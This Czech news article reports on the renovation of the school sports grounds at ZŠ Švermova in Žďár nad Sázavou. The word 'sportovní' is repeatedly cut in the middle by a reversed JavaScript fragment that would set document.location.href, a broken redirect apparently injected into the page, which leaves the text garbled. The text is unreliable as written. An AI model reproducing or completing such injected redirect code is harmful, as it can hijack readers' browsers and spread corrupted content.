Rainbow page separator

Děti si v novém školním roce vyzkoušejí zmodernizované hřiště

Středa, 15. srpna 2018

Žďár nad Sázavou / Do začátku nového školního roku bude dokončena první etapa obnovy spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního areálu u ZŠ Švermova. Ta zahrnuje vznik nového tartanového oválu s přírodním travnatým povrchem uprostřed a tribuny.
Příští rok pak žďárská radnice v rámci další etapy modernizace více než čtyři desítky let starého školního spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště předběžně počítá s výstavbou multifunkčního hřiště pro míčové hry. V atriu vznikne také venkovní učebna se stupňovitým posezením, kde se budou moci žáci nejen vzdělávat, ale i absolvovat různé kulturní a společenské školní akce. Areál celkově dostane moderní vzhled a zařadí se mezi městská spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště, která využívají školáci a v době mimo vyučování i veřejnost.
Již na podzim roku 2015 byly na spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovišti, které využívá na 750 žáků základní školy a někdy i děti z vedlejší mateřské školky, provedeny zemní práce související s kanalizací a přípravou na odvod vody.